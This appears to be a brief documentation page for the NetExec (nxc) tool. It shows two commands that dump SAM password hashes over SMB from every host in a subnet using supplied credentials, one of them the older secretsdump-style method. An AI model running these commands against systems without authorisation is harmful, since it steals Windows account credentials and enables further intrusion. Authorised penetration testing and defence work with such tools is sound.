Dump SAM

Dump SAM hashes using methods from secretsdump.py

#~ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam

If this command fail you can also try the old method (similar to secretdump)

#~ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam secdump

Last updated

Was this helpful?